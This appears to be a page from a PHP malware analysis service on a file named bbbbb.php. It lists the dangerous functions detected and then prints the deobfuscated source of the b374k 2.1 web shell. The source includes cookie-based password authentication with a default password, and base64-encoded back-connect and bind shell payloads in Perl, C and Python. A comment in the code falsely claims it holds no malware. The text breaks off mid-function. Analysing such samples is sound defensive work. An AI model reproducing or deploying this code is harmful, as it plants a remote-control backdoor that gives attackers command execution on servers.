PHP Malware Analysis
bbbbb.php
md5: 0421445303cfd0ec6bc20b3846e30ff0
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- free.d0ing.1987@gmail.com (Deobfuscated, Traces)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- phpinfo (Deobfuscated, HTML, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
- exec (Deobfuscated, Traces)
- passthru (Deobfuscated, Traces)
- proc_open (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
- system (Deobfuscated, Traces)
Files
- file_get_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
Title
URLs
- http://kerinci.net/?x=decode (Deobfuscated, Original)
- http://www.w3.org/1999/xhtml (Deobfuscated, HTML, Traces)
- http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
//*********************************************************************************************************************/
// b374k 2.1
// no malware on this code, you can check it by yourself ;-)
//
//
// encrypt your password to md5 here http://kerinci.net/?x=decode
$s_pass = "2cf1656ed3df6864df08feaf603ebe13";
// password (default is: kerinci)
eval /* PHPDeobfuscator eval output */ {
error_reporting(0);
@set_time_limit(0);
$s_name = "b374k";
$s_ver = "2.1";
$s_title = "b374k 2.1";
$s_auth = false;
if (strlen(trim($s_pass)) > 0) {
if (isset($_COOKIE['b374k'])) {
if (strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) {
$s_auth = true;
}
}
if (isset($_REQUEST['login'])) {
$login = strtolower(trim($_REQUEST['login']));
if (strtolower(trim($s_pass)) == md5($login)) {
setcookie("b374k", md5($login), time() + 604800);
$m = $_SERVER['SCRIPT_NAME'];
header("Location: " . $m);
auth();
die;
} else {
setcookie("b374k", $login, time() - 604800);
$m = $_SERVER['SCRIPT_NAME'];
header("Location: " . $m);
die;
}
}
} else {
$s_auth = true;
}
$xback_pl = "dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0=";
$xbind_pl = "bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI=";
$xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B";
$xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw==";
$xmulti_py = "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpXK2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG";
$wmulti_c = "7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2YNFoOsYDqNWUP9A1wc8f08W6kS4VYYcT4VfknAbpSsJ1pbGtu4KExznKe1+MZ9SMYAibzW4qfRTo5V++bBxAF62KANMUTXNvKywmJqphA0MLpWXPle9CFir9Sfay/MBq3j0j16tCa3d6vxAGVNACAJ5iDVebViN/go2fMMYAC7Xq+oJ3u8juL6wRLt3CinGyMhBbj/A9YNiQtNRXpSs+MWT5alWNh6X9cmyNSRec/kQ+iSBmw4TZxJwLGLeGT7UvvshvkzfFNKJph6ENvkd1zX0PTX2pei19o7nhq4O9AgX6WhrdX19jqUagIUkkVEq+NSTAqBLL2iv7Yc3pKygz1wm3zv5tRF8cZmlqzZoD2QLQVO3Xv5nV4Yh1aV7n0nmAkNjvH4ZQtnra2WDEDHMc7u41azE2p1OqL+7/og4zHTeFNENqYH/Zz5avjYkBSoIjkNMGuV0GqFbNV1JtI+C50QSqn6Fjre9zn7ez9ezcb7Y1VY4/fDn1WfPPcPz69esiK/fO2rXM69cdyU/GTN0DD1tLaoSKRlVBcn4VZpm/4vWHiyfiJa9bcoxIBL00tEdiqvN8GXpzkIKck+9n9nqH3DduLyKDXBTwitSlaI7fPzoYBurU+bjSVDl9n0uWPnA2Pdygh1/khxow81u0HEnc3xtDBjAiXbNeEh67alfbUcaqAL9whURCHMy5Phg/qDFtuD24G/Kqz+gYzCke7EUr16vv19YS+1YAs1OV/PIFXfEtHiuIFc2Poq99021Bibd8qdw4NBZ/7uXGFy1Pl+anH7XAc5Hn9V3mpCViltqOrEYeLOgruNToPnGfOa64UYq9SsS5xxEzXVXc1kr741dj3ysoQsdt7zqMhrCN/Y+NSHb3DD2Hfl2wSRTc5dnowBe+Hj6uVEWpbtBLrSY+XNh8L3DOF3hP/Up9ZQRe6a5o+VCMaH0Tg70ycBJ95/JZzzTTuc2FhnDgkQPvX+yNOtIahR7mJalD//nlXHqxxjCNX1ll/m07Ym1B4JNoaRelt6kM2dPLRSMMA7xw5+53VO1wvDRaMnE2NXngUYhivDmbsHMzZrD6LDeP088aSrb+51nzYi5/WINhF//AzRsBBpxP28Zeo5lcRlsetr2UttsruMkWRFmYYhal2rDVJASm/h/bN+pG2VNMZyMLCgSnPPWw/c9DiJsPvazvTOpvIao4Y5u2xLY1rhq1bKrlm/D2dNTZnx7+8P2B3isjazfvFPoBxNLd+49NGRYHN50cPZ7dtoRNcoUuHTMYJyRCJIPbskoq25eSUj4See38sCvgCLSC8nx7W5BmkN0I2c1DUp7FqUlwZK6uK5VgNO+YxfVH54Yd50N7lwbk32wPdokuo5xbrP/ldT9nuL90IblFRwzUN4FwCfWBBrEi14pY3tS7D64dyRjK7oRCiuZn7qZ+h1VtQciWjQjrP8+Vmmh0svc4+eeiKPh/+WvMZenPY8u6+U8tiXsCnwc0QO+avTqaK1DfSBCaM64d5++ll2RbLzXDVJppLE6ibtvcrj6Gtewj8amT8iZ5OlZHiv/RwvyF/nUhBZ5vyjwJY1zZapou6G2hlWaOnuRAXTO2PcWWr2l6y7bOz48O/Qa3+FUFrpleoF/g1v4DjvKd24cdtr8SzwQfK5djhEKD8WZEj5yAtzdZxCMm/pSCQ040WsoWGszbnaaLBhBYZHrwBxtS1ls0OH5LmDp5yIEqewdKnZ/Ltvvqpg28f5VomULgJdt4UyH9LKKdcGgNflNMk0zSbGqbl4ADEI/3B3+ulx/LVsSMRUknFc8U6Z8UD6UEZfTW7nKS0kCJH/BraF0V0jOW8g/Yhnf5x+V2iZSu1IuDj8pvOKCTbBf20ozieLS6J25Ug1bErdCYuxBpMdYgyKXNo4M0QN27O+iQ5sgJrF9/7KB+8V3PVk/vz8XR4cu9xkhj3qqbdrB9Ecn1eZdk9G3Po2uvVnZ21lU20Kyc0FkYi6mkqRHHOxkvDXA1szPslb4YibIezoGlVspvbuuNS8kNrbRJepJypOYeVh2rNOrGZ8ZmQ0uyppwkeXW5ivSecjjavAqdjxhRklBG8qbPa4sSanTufLygH7pQ3P1sIuxB+36HjHp5KhYRvrO8qoQVYeKGtyPKK+B9llfWaTys5R9BKBWNhVLrKgajHR7qkrp7IT8jQWT4Tw/w0T56W5S476PfdndGxowgfnFR+khrD5EGrgwNn01e5XBHRVlCrTqhWtt7in1wMFFT50TKtqQgMKM3iIUo7yRjdO7Q4LNHWXeYsDviY1+vpsSgdOP4QbhWDdSfLzqssR/IOG4iZC1d14VX0c9TQWMcKVtFIPW3ycsf8vnJSz9UWo7ZlEzBuTmX62uFF4xUngXEYXi2fAgtf7S9Kb5FOk5st7gz6nebtGpTa1RQc6KfiwJrNjie4Y9QknPcJqUjB1yuHzAnYPNAOjKpuVHOI4JtmqxDoXxv05qL4/COT4o1GY1jcUgkZF/XPn9DA/qEcJmR7KPevLvx5eA5LHhqrn78QDfkM1vRDq0gH+GIUquHd0lJGgqFlN3wEHLuzMgqv4Xw5+lJ+zRziBTvS1mdPH1DS+not7rW0l/KSaNR8yD6uEedrCGHuAdCP5c+cZbvy+uyVUP4R9hlRYgmHAZDF2yYF136slbF+NS0pj/QJb3xh8RUaJwhPZN5p95KL8e/8+cNDz3pYKUujxp88PE10VDL47irIXYxV7JPdx1P83UMTmtf++BTk5t+eJzG4OK43ojPy8GYyVVZj96slC2hnVM8IGKq8fwpuTddOu/KZEmBzubX6kM0Was5cwM6xQZNo4zZ7fsla+BexemqM6U0xfN5SYok68D6qw78OtnCOf9ql0dNZa+J/+7Bq8tgwgCd0lSF889Meno98EILCtfib6q0CF9drmvvGozlVROXvtINLbTqvLEuJkeqczWzv2K+Fep1sOKlzZ19CLOf5G/B9ebGX+SNtD0kn5HhhYkXfMQdTQ7nn+9H7414Dez6dnB5XKlPE0RNFsxDhV4KcLV+sy7XeJl+4AZjb+XbdseT2FDKdyeymlbTNhJpmng1LiW5Q9Pudox+htbS2LnmE3bH/oLM4VKxcVY/Rq4HOJGTNA77z1ZU3yIpXtxTYm/SjeVp72aFtzIw7fcM3FvBrj4ssxe0Cx9jfEIz8ykpox0MgDnAmNSa5KV78rUSX3i9WCvdz1/K1srWw8dvVmoHUL1XNu2zlRc37cPeLDrYg3ePhkwKS1+IkDchkpHhUMN7SRqlk9axDICtzy88CEREhkW2f4HhSCCCwxdCHDCSI07ksjgSMIwhYCTgZV6gqfVC9FyqLup86/xeOGgNgsdlJrC2xUqcd2vj2DweELsyMTaCk8CVQByxP48hkXAkRMdKcv5mL1MjVObU8ClnZxektjuAuHyOi8hByhY6iTnwIDzFE7KcWdbruGJIyuCtkYakgPYMNlvsaN4BD4ILmCgJdydHGG/PdHAIQi5OnFq8h+Xk6YxwcznCMoIrYKILSyiI5ya4cD28F+NSEvhcQYKTZCsD5g8I+WwnNgNiiFxjFoBz/YVSHlvYCY8L7CDQHBJzOYkcUMA4BYrAIP/U1AfV/lHgYhBECflz5eOl9d2OTsuOg76+hbGxXEBZgI91iA1kCyuivewlfDxr69zdw6vZgsmdgJNlaMhy/4lBGN4QFBayOsgpMNgpKiDMzSlyZejKOVHBEU6zycZxY+s93I8V63/LM+oF1shKOUcsqCVx6HjHc6VtFFQAc+Njz7DHvIx9lxrullTx2pl2Qx9ReNYcLei5YHFwNG/anKE+W9d1f7wsrHecFaTLRs1eMG32XEHfyPwtOlmWe9C50zMsr7ikkr2qkZt3dns76lXfyJdOz/tlWI4paO/OGY5iLFqIssHNj4wDfMsCX5DjtN1Y3ElS9BFUSxyKrlOOBE4gzzjqHYfvwmWyNQgam02DhHyav5jDgDh0sbA0aROgJyEGJnMhwlh6xyb8Cq7ALogD6a3mV1ybxSD44/kMq1BWp/WluaRQhgQKFC8RE8K6cc8+C9lSHifYhme9NkmcgfuYuoEYCTG+EYUI4oV8Ie0hGJmSyw/g2rDKKs7WcMUp8ZHSCI4AMv78rNlqrWDrBnbJDyKIKxRcrpp9/QKvxYJM2uyF26Z7QAJ5bUimtRGLMN+HYSfPRfvzhBIO9nO8//GLhuTqcNGuMGxlZqS/LbEUDGizpBnqnCxI94fEvGDxDyabZkvuD2ROjPkamECpqCXvJaKN5eHXfHy/L2uNjU2BXiYtIvO4jgkSAxGy8Vb5M7lHl4AQzxfsFLq85thLYhkiQyhFRNz1Ps/maRx2y/P7eZtEGAemjpdB/YepAWcfBlNox4AwQq4mbxFOL37OwUMsbN2igJNZvF8wHD5LlHI/vnOLhJtwgHeulhyx3ih+32AkLRLc7oDr+faFNxTGKl7NlDS+Zz5kSezwuYJCszMVzm+2mkDMlCaD7oEy2VYBT/cXHvMia3BYI9kqhdjCJD1tj/0Udt2ZEorQ0TbZc79219sFYR+0HTYZRGJIhiSbM6Jr51ypOJNrTRY7It9QRHhR3bUOhwVWVBKG5L7TxppACtbN7yh5s9C5GMJgZ6nPuGxaTL6dR49z7pjY5ZM+jn5iavfjqdoYqmmDs9i+AUFK+Hgg325OHNWZWXXycgwYrqbLHML7X2EPcc3jzidZkOXoRW4PpltVQ0ANAPDvPWpcnbGMCqjqNPtheL0Gp87VXbEHE4TolGKUVvKhT4ad4sHK6Xb9D4hhA6JTMizVm1ElvW5t8j6UmHCrB6uNlo/AEKT48Y/+bX9SpCDtL8Y/JZPfQmZ9Bj7AsPwRQkV2kX/+lEjMRS7XFhUinehnwTCsViLljWgFRt6Clvejk35BPOwP1cJbFBNVcm03Xto3WiI1kfkhpBNKTPytPuytBtKu2w6TiJGLmp9VdUAcACgxeg0QRRmLVmW7Tm8H4gNd3oKFj7K130dyMUHYBqhL8ev64NGStfDRrVpQ645RoORNaM0b+GiyFlCW8LRSm20Ehmum/wHQo7ahI9fDT1W7T2u3SwZmyuLsM6PpUfRpMJqhCrCVbQN8bks/ygdk/ZgsGAb+n/6v0/FCAGAX/hn7XqvL/oKVafU9f8Fqtbq68L/O26rFn2n5vZbHtYwuAoBZRV9t4MzoPDN6zoyrAiNWB4Z6uDsHhIYCtIB1NHrIjMKXJLLEkPP082J9pHvsDAoAoUIGO5TLFDPEKTQA0N4/2quJpb2sxByJBABmnhJaDOKwoN91Gk/70vhdWyHmcLSZpm+y6eDfAoFwEUcw8/TR5o3lCpkAwOQK2P87zvzf";
$favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII=";
$style = "tVbbitswEP0VwVJoYR18SdNd52kp9AtKX4tsybFYWTKysknW9N9ryVI0sZ3sFrbWS+KM5nLOmZkUkpx6VODyeafkXpD8LrbPFlVS6KhjrzRPkvbovle4YfyU/8S1bPD9L6oIFvj+STHMt6iUXKr8rqqqLfqD7hrMxKXrxD5b1GJCmNjlaXtED8Z31MjXqJCKUBUpTNi+y1ESm18WXx4Y0XWexPEnG6imeLDpUYPVjok8DgGGj5oedYQ524mc00qDC0iTK3eCSZ30AIjURgeG4XZ0oMUz05FWWHSVVE2OlNRY089Rkq2yb4Tuvrg6b5vA2Aj3AFSHa3i3/v6QPf1wJRJaSoU1kyIXUlBjuTKOmKhk72E0COQDm6iTnBF09uDq2MDyDDnxcBL71nnTBe8n8Pv3HdIDBzVlu1rn6dpceqFKsxJzh3/DCOFjZjt8wvdo9WJom1Rj4T6MbgrJibW3hh+GMadaD2h0LS5dpaNgqdgvC9bzjAwoQ2nIXVmZKw1D/Rm1tZd0kMaEQeg/fTRn+z5Cl7L+MEiWOnC90IDri8LzWlpmYE3Zxpxbqb2d2UU/rJho9/p1kEurZNPq4QN9wbyUhC6zNaYMezoFlRRSa9nALsgezZlPvFnruQT6ZY2GpGCDuIbIUtqAYoq97mfxLmp5NGemjLMQATewlNQ+YzrHdrg6yQbKNIZmZqxcnSPexgzMqyj60OfxOPYBZ4JGt6aClu1lkDp0U+a7CQIuBqWYdXPRSLO6h2m0pM7kwRxr2NGm2IsT6xFhXcvxyRUc5nvo4WE6KNrt+cDaP+6qOUeey9nIgFCNU3dJ3U4RGGMgBwv2yGhrOJ+QYKRbt2YVII0LfkUUifExZg0vkP5WHqV9gpONq2b7tlJgkPreEr9E1WKz+Yt12sMVr4zVRSd/BcM4i91OiyfQluYAICwGk3m7meBiIl8t0XMM7MPe9pCZvcbooWJTQgCtrlHfg6X3ZRmDW3x9c/p5D1e6xHstB0ip0MGzmVlndTWnQh7/Q28k031q8QhiHwNbLhb+yQXL60TZJ7ha+oOjut+++YPr5PZOAX4rKbUZQ3OZAm+b85QbZbukwBQspcD7Xw==";
$sortable_js = "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";
function swd($p)
{
$ps = explode(DIRECTORY_SEPARATOR, $p);
$pu = "";
for ($i = 0; $i < sizeof($ps) - 1; $i++) {
$pz = "";
for ($j = 0; $j <= $i; $j++) {
$pz .= $ps[$j] . DIRECTORY_SEPARATOR;
}
$pu .= "<a href=\"?d=" . $pz . "\">" . $ps[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
}
return trim($pu);
}
function rp($t)
{
return trim(str_replace("<br />", "", $t));
}
function cs($t)
{
return str_replace(" ", "_", $t);
